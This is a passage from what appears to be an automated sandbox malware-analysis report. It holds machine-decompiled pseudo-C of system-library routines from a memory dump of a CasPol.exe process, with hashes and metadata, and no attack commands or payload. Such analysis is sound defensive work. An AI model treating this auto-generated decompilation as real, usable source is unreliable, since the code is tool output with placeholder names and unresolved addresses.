                                                                				if( *_t51 != 0) {
                                                                					L6:
                                                                					return E0163FFB0(_t80, _t97, _t80);
                                                                				} else {
                                                                					 *(_t97 + 0x14) = _t102;
                                                                					_t84 =  *0x171538c; // 0x77996828
                                                                					if( *_t84 != 0x1715388) {
                                                                						_t85 = 3;
                                                                						asm("int 0x29");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						_push(0x2c);
                                                                						_push(0x16ff6e8);
                                                                						E0167D0E8(0x17185ec, _t97, _t102);
                                                                						 *((char*)(_t104 - 0x1d)) = 0;
                                                                						_t99 =  *(_t104 + 8);
                                                                						__eflags = _t99;
                                                                						if(_t99 == 0) {
                                                                							L13:
                                                                							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                							if(__eflags == 0) {
                                                                								E016F88F5(_t80, _t85, 0x1715388, _t99, _t102, __eflags);
                                                                							}
                                                                						} else {
                                                                							__eflags = _t99 -  *0x17186c0; // 0x11c07b0
                                                                							if(__eflags == 0) {
                                                                								goto L13;
                                                                							} else {
                                                                								__eflags = _t99 -  *0x17186b8; // 0x0
                                                                								if(__eflags == 0) {
                                                                									goto L13;
                                                                								} else {
                                                                									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                									__eflags =  *((char*)(_t59 + 0x28));
                                                                									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                										E01642280(_t99 + 0xe0, _t99 + 0xe0);
                                                                										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                										__eflags =  *((char*)(_t99 + 0xe5));
                                                                										if(__eflags != 0) {
                                                                											E016F88F5(0x17185ec, _t85, 0x1715388, _t99, _t102, __eflags);
                                                                										} else {
                                                                											__eflags =  *((char*)(_t99 + 0xe4));
                                                                											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                												 *((char*)(_t99 + 0xe4)) = 1;
                                                                												_push(_t99);
                                                                												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                												E0166AFD0();
                                                                											}
                                                                											while(1) {
                                                                												_t71 = _t99 + 8;
                                                                												 *(_t104 - 0x2c) = _t71;
                                                                												_t80 =  *_t71;
                                                                												_t95 = _t71[1];
                                                                												 *(_t104 - 0x28) = _t80;
                                                                												 *(_t104 - 0x24) = _t95;
                                                                												while(1) {
                                                                													L19:
                                                                													__eflags = _t95;
                                                                													if(_t95 == 0) {
                                                                														break;
                                                                													}
                                                                													_t102 = _t80;
                                                                													 *(_t104 - 0x30) = _t95;
                                                                													 *(_t104 - 0x24) = _t95 - 1;
                                                                													asm("lock cmpxchg8b [edi]");
                                                                													_t80 = _t102;
                                                                													 *(_t104 - 0x28) = _t80;
                                                                													 *(_t104 - 0x24) = _t95;
                                                                													__eflags = _t80 - _t102;
                                                                													_t99 =  *(_t104 + 8);
                                                                													if(_t80 != _t102) {
                                                                														continue;
                                                                													} else {
                                                                														__eflags = _t95 -  *(_t104 - 0x30);
                                                                														if(_t95 !=  *(_t104 - 0x30)) {
                                                                															continue;
                                                                														} else {
                                                                															__eflags = _t95;
                                                                															if(_t95 != 0) {
                                                                																_t74 = 0;
                                                                																 *(_t104 - 0x34) = 0;
                                                                																_t102 = 0;
                                                                																__eflags = 0;
                                                                																while(1) {
                                                                																	 *(_t104 - 0x3c) = _t102;
                                                                																	__eflags = _t102 - 3;
                                                                																	if(_t102 >= 3) {
                                                                																		break;
                                                                																	}
                                                                																	__eflags = _t74;
                                                                																	if(_t74 != 0) {
                                                                																		L49:
                                                                																		_t102 =  *_t74;
                                                                																		__eflags = _t102;
                                                                																		if(_t102 != 0) {
                                                                																			_t102 =  *(_t102 + 4);
                                                                																			__eflags = _t102;
                                                                																			if(_t102 != 0) {
                                                                																				 *0x171b1e0(_t74, _t99);
                                                                																				 *_t102();
                                                                																			}
                                                                																		}
                                                                																		do {
                                                                																			_t71 = _t99 + 8;
                                                                																			 *(_t104 - 0x2c) = _t71;
                                                                																			_t80 =  *_t71;
                                                                																			_t95 = _t71[1];
                                                                																			 *(_t104 - 0x28) = _t80;
                                                                																			 *(_t104 - 0x24) = _t95;
                                                                																			goto L19;
                                                                																		} while (_t74 == 0);
                                                                																		goto L49;
                                                                																	} else {
                                                                																		_t82 = 0;
                                                                																		__eflags = 0;
                                                                																		while(1) {
                                                                																			 *(_t104 - 0x38) = _t82;
                                                                																			__eflags = _t82 -  *0x17184c0;
                                                                																			if(_t82 >=  *0x17184c0) {
                                                                																				break;
                                                                																			}
                                                                																			__eflags = _t74;
                                                                																			if(_t74 == 0) {
                                                                																				_t77 = E016F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                																				__eflags = _t77;
                                                                																				if(_t77 == 0) {
                                                                																					_t74 = 0;
                                                                																					__eflags = 0;
                                                                																				} else {
                                                                																					_t74 = _t77 + 0xfffffff4;
                                                                																				}
                                                                																				 *(_t104 - 0x34) = _t74;
                                                                																				_t82 = _t82 + 1;
                                                                																				continue;
                                                                																			}
                                                                																			break;
                                                                																		}
                                                                																		_t102 = _t102 + 1;
                                                                																		continue;
                                                                																	}
                                                                																	goto L20;
                                                                																}
                                                                																__eflags = _t74;
                                                                															}
                                                                														}
                                                                													}
                                                                													break;
                                                                												}
                                                                												L20:
                                                                												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                												 *((char*)(_t99 + 0xe5)) = 1;
                                                                												 *((char*)(_t104 - 0x1d)) = 1;
                                                                												goto L21;
                                                                											}
                                                                										}
                                                                										L21:
                                                                										 *(_t104 - 4) = 0xfffffffe;
                                                                										E0162922A(_t99);
                                                                										_t64 = E01647D50();
                                                                										__eflags = _t64;
                                                                										if(_t64 != 0) {
                                                                											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                										} else {
                                                                											_t67 = 0x7ffe0386;
                                                                										}
                                                                										__eflags =  *_t67;
                                                                										if( *_t67 != 0) {
                                                                											_t67 = E016F8B58(_t99);
                                                                										}
                                                                										__eflags =  *((char*)(_t104 - 0x1d));
                                                                										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                											__eflags = _t99 -  *0x17186c0; // 0x11c07b0
                                                                											if(__eflags != 0) {
                                                                												__eflags = _t99 -  *0x17186b8; // 0x0
                                                                												if(__eflags == 0) {
                                                                													_t94 = 0x17186bc;
                                                                													_t87 = 0x17186b8;
                                                                													goto L27;
                                                                												} else {
                                                                													__eflags = _t67 | 0xffffffff;
                                                                													asm("lock xadd [edi], eax");
                                                                													if(__eflags == 0) {
                                                                														E01629240(_t80, _t99, _t99, _t102, __eflags);
                                                                													}
                                                                												}
                                                                											} else {
                                                                												_t94 = 0x17186c4;
                                                                												_t87 = 0x17186c0;
                                                                												L27:
                                                                												E01659B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                											}
                                                                										}
                                                                									} else {
                                                                										goto L13;
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                						return E0167D130(_t80, _t99, _t102);
                                                                					} else {
                                                                						 *_t51 = 0x1715388;
                                                                						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                						 *_t84 = _t51;
                                                                						 *0x171538c = _t51;
                                                                						goto L6;
                                                                					}
                                                                				}
                                                                			}




















                                                                0x0162917f
                                                                0x01629182
                                                                0x01629182
                                                                0x01629187
                                                                0x01629187
                                                                0x0162918a
                                                                0x0162918d
                                                                0x0162918f
                                                                0x01629192
                                                                0x01629195
                                                                0x01629198
                                                                0x01629198
                                                                0x01629198
                                                                0x0162919a
                                                                0x00000000
                                                                0x00000000
                                                                0x0168371f
                                                                0x01683721
                                                                0x01683727
                                                                0x0168372f
                                                                0x01683733
                                                                0x01683735
                                                                0x01683738
                                                                0x0168373b
                                                                0x0168373d
                                                                0x01683740
                                                                0x00000000
                                                                0x01683746
                                                                0x01683746
                                                                0x01683749
                                                                0x00000000
                                                                0x0168374f
                                                                0x0168374f
                                                                0x01683751
                                                                0x01683757
                                                                0x01683759
                                                                0x0168375c
                                                                0x0168375c
                                                                0x0168375e
                                                                0x0168375e
                                                                0x01683761
                                                                0x01683764
                                                                0x00000000
                                                                0x00000000
                                                                0x01683766
                                                                0x01683768
                                                                0x016837a3
                                                                0x016837a3
                                                                0x016837a5
                                                                0x016837a7
                                                                0x016837ad
                                                                0x016837b0
                                                                0x016837b2
                                                                0x016837bc
                                                                0x016837c2
                                                                0x016837c2
                                                                0x016837b2
                                                                0x01629187
                                                                0x01629187
                                                                0x0162918a
                                                                0x0162918d
                                                                0x0162918f
                                                                0x01629192
                                                                0x01629195
                                                                0x00000000
                                                                0x01629195
                                                                0x00000000
                                                                0x0168376a
                                                                0x0168376a
                                                                0x0168376a
                                                                0x0168376c
                                                                0x0168376c
                                                                0x0168376f
                                                                0x01683775
                                                                0x00000000
                                                                0x00000000
                                                                0x01683777
                                                                0x01683779
                                                                0x01683782
                                                                0x01683787
                                                                0x01683789
                                                                0x01683790
                                                                0x01683790
                                                                0x0168378b
                                                                0x0168378b
                                                                0x0168378b
                                                                0x01683792
                                                                0x01683795
                                                                0x00000000
                                                                0x01683795
                                                                0x00000000
                                                                0x01683779
                                                                0x01683798
                                                                0x00000000
                                                                0x01683798
                                                                0x00000000
                                                                0x01683768
                                                                0x0168379b
                                                                0x0168379b
                                                                0x01683751
                                                                0x01683749
                                                                0x00000000
                                                                0x01683740
                                                                0x016291a0
                                                                0x016291a3
                                                                0x016291a9
                                                                0x016291b0
                                                                0x00000000
                                                                0x016291b0
                                                                0x01629187
                                                                0x016291b4
                                                                0x016291b4
                                                                0x016291bb
                                                                0x016291c0
                                                                0x016291c5
                                                                0x016291c7
                                                                0x016837da
                                                                0x016291cd
                                                                0x016291cd
                                                                0x016291cd
                                                                0x016291d2
                                                                0x016291d5
                                                                0x01629239
                                                                0x01629239
                                                                0x016291d7
                                                                0x016291db
                                                                0x016291e1
                                                                0x016291e7
                                                                0x016291fd
                                                                0x01629203
                                                                0x0162921e
                                                                0x01629223
                                                                0x00000000
                                                                0x01629205
                                                                0x01629205
                                                                0x01629208
                                                                0x0162920c
                                                                0x01629214
                                                                0x01629214
                                                                0x0162920c
                                                                0x016291e9
                                                                0x016291e9
                                                                0x016291ee
                                                                0x016291f3
                                                                0x016291f3
                                                                0x016291f3
                                                                0x016291e7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01629134
                                                                0x01629125
                                                                0x0162911d
                                                                0x0162914e
                                                                0x016290d1
                                                                0x016290d1
                                                                0x016290d3
                                                                0x016290d6
                                                                0x016290d8
                                                                0x00000000
                                                                0x016290d8
                                                                0x016290cf

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 44290cdd658b36c24840e9eeac176c89a96cc0afc8eb1153d800abe416f984cc
                                                                • Instruction ID: 30cd31c7997f5194d24f22c37ff86c8c11e15e0ebe58a35e5d721c230b16398a
                                                                • Opcode Fuzzy Hash: 44290cdd658b36c24840e9eeac176c89a96cc0afc8eb1153d800abe416f984cc
                                                                • Instruction Fuzzy Hash: 38018172505A288FD3299F1CDC40B12BBA9EBC6728F25816AE6059B795C378DC41CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 46%
                                                                			E016BC450(intOrPtr* _a4) {
                                                                				signed char _t25;
                                                                				intOrPtr* _t26;
                                                                				intOrPtr* _t27;
                                                                
                                                                				_t26 = _a4;
                                                                				_t25 =  *(_t26 + 0x10);
                                                                				if((_t25 & 0x00000003) != 1) {
                                                                					_push(0);
                                                                					_push(0);
                                                                					_push(0);
                                                                					_push( *((intOrPtr*)(_t26 + 8)));
                                                                					_push(0);
                                                                					_push( *_t26);
                                                                					E01669910();
                                                                					_t25 =  *(_t26 + 0x10);
                                                                				}
                                                                				if((_t25 & 0x00000001) != 0) {
                                                                					_push(4);
                                                                					_t7 = _t26 + 4; // 0x4
                                                                					_t27 = _t7;
                                                                					_push(_t27);
                                                                					_push(5);
                                                                					_push(0xfffffffe);
                                                                					E016695B0();
                                                                					if( *_t27 != 0) {
                                                                						_push( *_t27);
                                                                						E016695D0();
                                                                					}
                                                                				}
                                                                				_t8 = _t26 + 0x14; // 0x14
                                                                				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                				}
                                                                				_push( *_t26);
                                                                				E016695D0();
                                                                				return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                			}







                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                • Instruction ID: ccf22815b2c1803df4978312e8a9a7945e69a3fc713328ae8a72818ad37ba5ad
                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                • Instruction Fuzzy Hash: C801B572140506BFE721AF69CD80EA2FB7EFF64394F004529F61442660CB35EDA1CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			E016F4015(signed int __eax, signed int __ecx) {
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed char _t10;
                                                                				signed int _t28;
                                                                
                                                                				_push(__ecx);
                                                                				_t28 = __ecx;
                                                                				asm("lock xadd [edi+0x24], eax");
                                                                				_t10 = (__eax | 0xffffffff) - 1;
                                                                				if(_t10 == 0) {
                                                                					_t1 = _t28 + 0x1c; // 0x1e
                                                                					E01642280(_t10, _t1);
                                                                					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                					E01642280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17186ac);
                                                                					E0162F900(0x17186d4, _t28);
                                                                					E0163FFB0(0x17186ac, _t28, 0x17186ac);
                                                                					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                					E0163FFB0(0, _t28, _t1);
                                                                					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                					}
                                                                					_t10 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                				}
                                                                				return _t10;
                                                                			}








                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f25da722ce737dbcd3b79dc44a147a2294a8be15f1e1b7d2534fca8921ae4c96
                                                                • Instruction ID: 958f18d626aa7702c251cc115f8f079fcacff9f39317ab800584e068247e13e5
                                                                • Opcode Fuzzy Hash: f25da722ce737dbcd3b79dc44a147a2294a8be15f1e1b7d2534fca8921ae4c96
                                                                • Instruction Fuzzy Hash: E3018F726019467FD311AB6DCD80E13B7ADFB95760B00062DF60887A21CB24EC11CAE8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 61%
                                                                			E016E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                				signed int _v8;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				short _v54;
                                                                				char _v60;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed char* _t21;
                                                                				intOrPtr _t27;
                                                                				intOrPtr _t33;
                                                                				intOrPtr _t34;
                                                                				signed int _t35;
                                                                
                                                                				_t32 = __edx;
                                                                				_t27 = __ebx;
                                                                				_v8 =  *0x171d360 ^ _t35;
                                                                				_t33 = __edx;
                                                                				_t34 = __ecx;
                                                                				E0166FA60( &_v60, 0, 0x30);
                                                                				_v20 = _a4;
                                                                				_v16 = _a8;
                                                                				_v28 = _t34;
                                                                				_v24 = _t33;
                                                                				_v54 = 0x1033;
                                                                				if(E01647D50() == 0) {
                                                                					_t21 = 0x7ffe0388;
                                                                				} else {
                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                				}
                                                                				_push( &_v60);
                                                                				_push(0x10);
                                                                				_push(0x20402);
                                                                				_push( *_t21 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 082867df6634c1be7ae5aaaca515b859ad08aabf57aec41d171faf2bdb722c2f
                                                                • Instruction ID: ae9768e8001e27d31c0cea6c4cc638c685801040c54205ea7d0b224b6794458f
                                                                • Opcode Fuzzy Hash: 082867df6634c1be7ae5aaaca515b859ad08aabf57aec41d171faf2bdb722c2f
                                                                • Instruction Fuzzy Hash: D5015E71A01359AFDB14DFA9DC45EAEBBB8EF55710F00406AB904EB380DA749E01CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 61%
                                                                			E016E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                				signed int _v8;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				short _v54;
                                                                				char _v60;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed char* _t21;
                                                                				intOrPtr _t27;
                                                                				intOrPtr _t33;
                                                                				intOrPtr _t34;
                                                                				signed int _t35;
                                                                
                                                                				_t32 = __edx;
                                                                				_t27 = __ebx;
                                                                				_v8 =  *0x171d360 ^ _t35;
                                                                				_t33 = __edx;
                                                                				_t34 = __ecx;
                                                                				E0166FA60( &_v60, 0, 0x30);
                                                                				_v20 = _a4;
                                                                				_v16 = _a8;
                                                                				_v28 = _t34;
                                                                				_v24 = _t33;
                                                                				_v54 = 0x1034;
                                                                				if(E01647D50() == 0) {
                                                                					_t21 = 0x7ffe0388;
                                                                				} else {
                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                				}
                                                                				_push( &_v60);
                                                                				_push(0x10);
                                                                				_push(0x20402);
                                                                				_push( *_t21 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2464612e831e4d62129f327c157363836aa8a58e413ce8cab99f089f0ac67fb9
                                                                • Instruction ID: ea68f37c1b071b9a0c9c233b1b843111c18c0c59fb3c2cfbee791529b12a3159
                                                                • Opcode Fuzzy Hash: 2464612e831e4d62129f327c157363836aa8a58e413ce8cab99f089f0ac67fb9
                                                                • Instruction Fuzzy Hash: 4C019E71A01258EFCB10DFA9DC45EAEBBB8EF45710F40406AF904EB380DA70DA00CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 91%
                                                                			E016258EC(intOrPtr __ecx) {
                                                                				signed int _v8;
                                                                				char _v28;
                                                                				char _v44;
                                                                				char _v76;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				intOrPtr _t10;
                                                                				intOrPtr _t16;
                                                                				intOrPtr _t17;
                                                                				intOrPtr _t27;
                                                                				intOrPtr _t28;
                                                                				signed int _t29;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t29;
                                                                				_t10 =  *[fs:0x30];
                                                                				_t27 = __ecx;
                                                                				if(_t10 == 0) {
                                                                					L6:
                                                                					_t28 = 0x1605c80;
                                                                				} else {
                                                                					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                					if(_t16 == 0) {
                                                                						goto L6;
                                                                					} else {
                                                                						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                					}
                                                                				}
                                                                				if(E01625943() != 0 &&  *0x1715320 > 5) {
                                                                					E016A7B5E( &_v44, _t27);
                                                                					_t22 =  &_v28;
                                                                					E016A7B5E( &_v28, _t28);
                                                                					_t11 = E016A7B9C(0x1715320, 0x160bf15,  &_v28, _t22, 4,  &_v76);
                                                                				}
                                                                				return E0166B640(_t11, _t17, _v8 ^ _t29, 0x160bf15, _t27, _t28);
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 762ff2127c565c3d4394ebf183ca0e254e7fc8f9accaeec08a4aa95839c855af
                                                                • Instruction ID: c865538e835c7ad7043a36cb21f8b9f09b69cf201d75e638123891dce3335e51
                                                                • Opcode Fuzzy Hash: 762ff2127c565c3d4394ebf183ca0e254e7fc8f9accaeec08a4aa95839c855af
                                                                • Instruction Fuzzy Hash: 2401DF71B00925ABC728EE6CDC009EFB7AAEB92130F94406DDA06D7284DF21DD02CA94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                				char _v8;
                                                                				void* _v11;
                                                                				unsigned int _v12;
                                                                				void* _v15;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				char* _t16;
                                                                				signed int* _t35;
                                                                
                                                                				_t22 = __ebx;
                                                                				_t35 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t13 =  !( *__ecx) + 1;
                                                                				_v12 =  !( *__ecx) + 1;
                                                                				if(_a4 != 0) {
                                                                					E016F165E(__ebx, 0x1718ae4, (__edx -  *0x1718b04 >> 0x14) + (__edx -  *0x1718b04 >> 0x14), __edi, __ecx, (__edx -  *0x1718b04 >> 0x14) + (__edx -  *0x1718b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                				}
                                                                				E016EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                				if(E01647D50() == 0) {
                                                                					_t16 = 0x7ffe0388;
                                                                				} else {
                                                                					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                				}
                                                                				if( *_t16 != 0) {
                                                                					_t16 = E016DFE3F(_t22, _t35, _v8, _v12);
                                                                				}
                                                                				return _t16;
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1be93617f7be283d7a79fc91bf87842aa3b0a2a7462a7dab7739ed72c1158ce
                                                                • Instruction ID: be50a4c17ae1838409bd2d00d0d6708332836dabbfcedaf30b9784973a5aa72b
                                                                • Opcode Fuzzy Hash: c1be93617f7be283d7a79fc91bf87842aa3b0a2a7462a7dab7739ed72c1158ce
                                                                • Instruction Fuzzy Hash: F8012872604742DBC710DF6CCD44B1ABBE6AB84250F04862DFA8583390DF30D541CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0163B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                				signed char _t11;
                                                                				signed char* _t12;
                                                                				intOrPtr _t24;
                                                                				signed short* _t25;
                                                                
                                                                				_t25 = __edx;
                                                                				_t24 = __ecx;
                                                                				_t11 = ( *[fs:0x30])[0x50];
                                                                				if(_t11 != 0) {
                                                                					if( *_t11 == 0) {
                                                                						goto L1;
                                                                					}
                                                                					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                					L2:
                                                                					if( *_t12 != 0) {
                                                                						_t12 =  *[fs:0x30];
                                                                						if((_t12[0x240] & 0x00000004) == 0) {
                                                                							goto L3;
                                                                						}
                                                                						if(E01647D50() == 0) {
                                                                							_t12 = 0x7ffe0385;
                                                                						} else {
                                                                							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                						}
                                                                						if(( *_t12 & 0x00000020) == 0) {
                                                                							goto L3;
                                                                						}
                                                                						return E016A7016(_a4, _t24, 0, 0, _t25, 0);
                                                                					}
                                                                					L3:
                                                                					return _t12;
                                                                				}
                                                                				L1:
                                                                				_t12 = 0x7ffe0384;
                                                                				goto L2;
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                • Instruction ID: ef942c9196e98bd2c8b444199b1c0f69738b5912dc677fcfbb56db1864b220ac
                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                • Instruction Fuzzy Hash: 31018F722049809FE3229B5DCD88F66BBD8EBD5754F0900A2FA19CBB52D728DC81C624
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 59%
                                                                			E016DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				signed int _v12;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				short _v58;
                                                                				char _v64;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed char* _t18;
                                                                				intOrPtr _t24;
                                                                				intOrPtr _t30;
                                                                				intOrPtr _t31;
                                                                				signed int _t32;
                                                                
                                                                				_t29 = __edx;
                                                                				_t24 = __ebx;
                                                                				_v12 =  *0x171d360 ^ _t32;
                                                                				_t30 = __edx;
                                                                				_t31 = __ecx;
                                                                				E0166FA60( &_v64, 0, 0x30);
                                                                				_v24 = _a4;
                                                                				_v32 = _t31;
                                                                				_v28 = _t30;
                                                                				_v58 = 0x267;
                                                                				if(E01647D50() == 0) {
                                                                					_t18 = 0x7ffe0388;
                                                                				} else {
                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                				}
                                                                				_push( &_v64);
                                                                				_push(0x10);
                                                                				_push(0x20402);
                                                                				_push( *_t18 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49f9cc02e27b231d61eff29669ed5a2c1192d66d0843d347272d682b252d11d8
                                                                • Instruction ID: e779ad73f23fc457af7bca19939df2113e292bdb07557f5a6c542a44833e338d
                                                                • Opcode Fuzzy Hash: 49f9cc02e27b231d61eff29669ed5a2c1192d66d0843d347272d682b252d11d8
                                                                • Instruction Fuzzy Hash: 7D018471E00259AFDB14DFA9DC45FAEBBB9EF54710F00406AB901EB381DA709A01C798
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 59%
                                                                			E016DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				signed int _v12;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
